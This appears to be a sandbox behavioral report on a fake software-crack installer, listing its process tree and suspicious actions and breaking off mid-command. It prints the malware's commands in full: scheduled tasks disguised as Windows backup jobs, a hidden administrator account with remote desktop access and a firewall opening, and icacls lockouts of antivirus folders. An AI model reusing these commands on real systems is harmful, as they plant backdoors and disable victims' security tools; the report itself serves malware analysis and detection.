Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

unsecapp.exe

pid process

440 unsecapp.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

664

pid	process
440	unsecapp.exe

pid	process
664

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

firefox.exewinserv.exewinserv.exeRDPWinst.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2940	firefox.exe
Token: SeDebugPrivilege	2940	firefox.exe
Token: SeDebugPrivilege	2940	firefox.exe
Token: SeDebugPrivilege	2940	firefox.exe
Token: SeDebugPrivilege	2940	firefox.exe
Token: SeDebugPrivilege	2940	firefox.exe
Token: SeDebugPrivilege	4600	winserv.exe
Token: SeTakeOwnershipPrivilege	5172	winserv.exe
Token: SeTcbPrivilege	5172	winserv.exe
Token: SeTcbPrivilege	5172	winserv.exe
Token: SeDebugPrivilege	5348	RDPWinst.exe
Token: SeAuditPrivilege	5372	svchost.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

firefox.exe

pid process

2940 firefox.exe
2940 firefox.exe
2940 firefox.exe
2940 firefox.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

firefox.exe

pid process

2940 firefox.exe
2940 firefox.exe
2940 firefox.exe

Suspicious use of SetWindowsHookEx 24 IoCs

Processes:

firefox.exeCrack.exeupdate.exewin.exesvchost.exeIP.exesmss.exewinserv.exewinserv.exeRDPWinst.exewinserv.exe

pid	process
2940	firefox.exe
2940	firefox.exe
2940	firefox.exe
2940	firefox.exe
6576	Crack.exe
6624	update.exe
5132	win.exe
7136	svchost.exe
5676	IP.exe
5484	smss.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
4600	winserv.exe
5172	winserv.exe
5172	winserv.exe
5172	winserv.exe
5172	winserv.exe
5348	RDPWinst.exe
6664	winserv.exe
6664	winserv.exe
6664	winserv.exe
6664	winserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

firefox.exefirefox.exe

description	pid	process	target process
PID 4956 wrote to memory of 2940	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 2940	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 2940	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 2940	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 2940	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 2940	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 2940	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 2940	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 2940	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 2940	4956	firefox.exe	firefox.exe
PID 4956 wrote to memory of 2940	4956	firefox.exe	firefox.exe
PID 2940 wrote to memory of 3908	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 3908	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 5112	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 3508	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 3508	2940	firefox.exe	firefox.exe
PID 2940 wrote to memory of 3508	2940	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\AutoIt-Extractor-net40-x64.exe
"C:\Users\Admin\AppData\Local\Temp\AutoIt-Extractor-net40-x64.exe"
1⤵
PID:332

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4956

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2940

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.0.1060112846\1864619824" -parentBuildID 20221007134813 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0a88c22-de31-4b0f-8392-a84f13ab91be} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 1964 1f6bb8cc758 gpu
3⤵
PID:3908

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.1.894055126\1692423142" -parentBuildID 20221007134813 -prefsHandle 2352 -prefMapHandle 2340 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4de3356a-53f3-40e0-a478-5cae6cbdc5c2} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 2364 1f6bb233558 socket
3⤵
- Checks processor information in registry
PID:5112

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.2.1659485514\1669713410" -childID 1 -isForBrowser -prefsHandle 3252 -prefMapHandle 3248 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8018c9e5-9683-455b-9dc3-26d3a40166ff} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 3264 1f6bf779b58 tab
3⤵
PID:3508

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.3.1480727224\1854720312" -childID 2 -isForBrowser -prefsHandle 3632 -prefMapHandle 3628 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db950dac-f7e3-4986-93c4-65beb4bdd642} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 3644 1f6bde9e858 tab
3⤵
PID:3624

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.4.1498262898\1898091195" -childID 3 -isForBrowser -prefsHandle 4604 -prefMapHandle 4600 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed2765ff-6f51-4d63-948b-4f50334da547} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 4260 1f6c0f8e858 tab
3⤵
PID:1708

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.5.1851941882\408062777" -childID 4 -isForBrowser -prefsHandle 4320 -prefMapHandle 4980 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f8f49db-609d-48c2-a8ef-5c6b9efffa4e} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 2844 1f6be20b858 tab
3⤵
PID:4064

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.6.912555074\1036222770" -childID 5 -isForBrowser -prefsHandle 5116 -prefMapHandle 5016 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82c61f07-ecce-468d-8b6e-43c710a91469} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 4600 1f6be20ca58 tab
3⤵
PID:3604

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.7.1162921940\1451388421" -childID 6 -isForBrowser -prefsHandle 5344 -prefMapHandle 5348 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d0c8603-8714-4fde-a336-fb6a9f55ea37} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 5336 1f6be20cd58 tab
3⤵
PID:2164

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.8.1202514959\812861856" -childID 7 -isForBrowser -prefsHandle 5784 -prefMapHandle 2788 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7525a20e-121b-4b22-bbe0-bc939e8ee03d} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 2964 1f6bf8bd858 tab
3⤵
PID:5816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3736 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
1⤵
PID:6132

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3532

C:\Users\Admin\Desktop\john\Setup.exe
"C:\Users\Admin\Desktop\john\Setup.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6292

C:\Users\Admin\Desktop\john\SoftwareInstall.exe
C:\Users\Admin\Desktop\john\SoftwareInstall.exe
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6360

C:\ProgramData\Setup\install.exe
C:\ProgramData\Setup\install.exe -pkasoft
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:6428

C:\ProgramData\Setup\Crack.exe
"C:\ProgramData\Setup\Crack.exe"
3⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6576

C:\ProgramData\Setup\update.exe
"C:\ProgramData\Setup\update.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:6624

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ServiceManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:6732

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CashClean" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:1812

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\MasterData" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:5388

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:5340

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:1572

C:\ProgramData\Microsoft\win.exe
C:\ProgramData\Microsoft\win.exe -ppidar
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5132

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\FilesystemY\RecoveryHosts" /TR "C:\ProgramData\Microsoft\MapData\QouW64\FilesystemY.bat" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:6936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
4⤵
PID:6988

C:\Windows\system32\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:7036

C:\ProgramData\Setup\svchost.exe
C:\ProgramData\Setup\svchost.exe -ppidar
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:7136

C:\ProgramData\Setup\IP.exe
"C:\ProgramData\Setup\IP.exe"
5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5676

C:\Windows\SysWOW64\unsecapp.exe
C:\Windows\SysWOW64\unsecapp.exe
6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
PID:440

C:\ProgramData\Setup\smss.exe
"C:\ProgramData\Setup\smss.exe"
5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:5484

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
6⤵
- Creates scheduled task(s)
PID:5608

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
6⤵
- Creates scheduled task(s)
PID:6644

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe"
6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4600

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" -second
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user John 12345 /add
6⤵
PID:2080

C:\Windows\system32\net.exe
net user John 12345 /add
7⤵
PID:3048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user John 12345 /add
8⤵
PID:456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
6⤵
PID:2760

C:\Windows\system32\net.exe
net localgroup "Администраторы" John /add
7⤵
PID:4892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" John /add
8⤵
PID:1332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
6⤵
PID:1804

C:\Windows\system32\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
7⤵
PID:4576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
8⤵
PID:5868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
6⤵
PID:5176

C:\Windows\system32\net.exe
net localgroup "Пользователи удаленного управления" john /add" John /add
7⤵
PID:4132

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
8⤵
PID:2604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
6⤵
PID:5784

C:\Windows\system32\net.exe
net localgroup "Administrators" John /add
7⤵
PID:4632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
8⤵
PID:5924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
6⤵
PID:2356

C:\Windows\system32\net.exe
net localgroup "Administradores" John /add
7⤵
PID:1764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
8⤵
PID:5884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
6⤵
PID:4656

C:\Windows\system32\net.exe
net localgroup "Remote Desktop Users" john /add
7⤵
PID:6096

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
8⤵
PID:32

C:\ProgramData\RDPWinst.exe
C:\ProgramData\RDPWinst.exe -i
6⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5348

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
7⤵
- Modifies Windows Firewall
PID:1708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
6⤵
PID:4184

C:\Windows\system32\timeout.exe
timeout 10
7⤵
- Delays execution with timeout.exe
PID:5560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5952

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:7120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
4⤵
PID:2288

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
5⤵
PID:4848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2296

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)
5⤵
PID:3548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
4⤵
PID:5220

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5560

C:\Windows\system32\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
4⤵
PID:1844

C:\Windows\system32\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4500

C:\Windows\system32\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:3520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
4⤵
PID:5196

C:\Windows\system32\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4516

C:\Windows\system32\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
4⤵
PID:2096

C:\Windows\system32\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
5⤵
PID:6424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
4⤵
PID:6224

C:\Windows\system32\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
5⤵
PID:6616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)
4⤵
PID:6212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
4⤵
PID:6388

C:\Windows\system32\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
5⤵
- Modifies file permissions
PID:3400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)
4⤵
PID:6340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
4⤵
PID:5088

C:\Windows\system32\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
5⤵
PID:6592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
4⤵
PID:6536

C:\Windows\system32\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
5⤵
PID:4080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)
4⤵
PID:2120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6312

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)
4⤵
PID:3652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
4⤵
PID:5716

C:\Windows\system32\icacls.exe
icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)
4⤵
PID:5388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
4⤵
PID:636

C:\Windows\system32\icacls.exe
icacls C:\FRST /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:6864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6896

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)
4⤵
PID:6196

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:7012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)
4⤵
PID:4756

C:\Windows\system32\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)
